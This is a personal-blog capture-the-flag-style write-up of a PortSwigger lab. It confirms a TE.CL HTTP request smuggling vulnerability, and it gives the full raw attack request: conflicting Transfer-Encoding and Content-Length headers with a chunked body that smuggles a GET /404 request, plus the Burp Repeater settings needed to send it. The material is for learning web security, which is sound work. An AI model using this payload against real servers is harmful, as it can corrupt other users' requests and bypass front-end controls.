Siunam's Website

My personal website

Home About Blog Writeups Projects E-Portfolio

HTTP request smuggling, confirming a TE.CL vulnerability via differential responses | Jan 28, 2023

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: HTTP request smuggling, confirming a TE.CL vulnerability via differential responses! Without further ado, let’s dive in.

Background

This lab involves a front-end and back-end server, and the back-end server doesn’t support chunked encoding.

To solve the lab, smuggle a request to the back-end server, so that a subsequent request for / (the web root) triggers a 404 Not Found response.

Exploitation

Home page:

Burp Suite HTTP history:

We can send this request to Burp Suite’s Repeater:

Then change the request method to POST:

Now, we can try to test the web application is vulnerable to TE.CL HTTP request smuggling (Front-end uses Transfer-Encoding header, back-end uses Content-Length header).

To do send, we first send an attack request:

POST / HTTP/1.1
Host: 0aa8008603dfb20dc1821ccb00080051.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Content-Length: 4

a7
GET /404 HTTP/1.1
Host: 0aa8008603dfb20dc1821ccb00080051.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

smuggled=yes
0


Note: You need to include the trailing sequence \r\n\r\n following the final 0, and go to the Repeater menu and ensure that the “Update Content-Length” option is unchecked.

This attack request will:

GET /404 HTTP/1.1
Host: 0aa8008603dfb20dc1821ccb00080051.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

smuggled=yes
0


After that, we can send a normal GET request:

Smuggled normal GET request:

GET /404 HTTP/1.1
Host: 0aa8008603dfb20dc1821ccb00080051.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

smuggled=yes
0

GET / HTTP/1.1
[...]

Nice! We successfully smuggled an attack 404 GET request, and can confirm the web application is vulnerable to TE.CL HTTP request smuggling.

What we’ve learned:

  1. HTTP request smuggling, confirming a TE.CL vulnerability via differential responses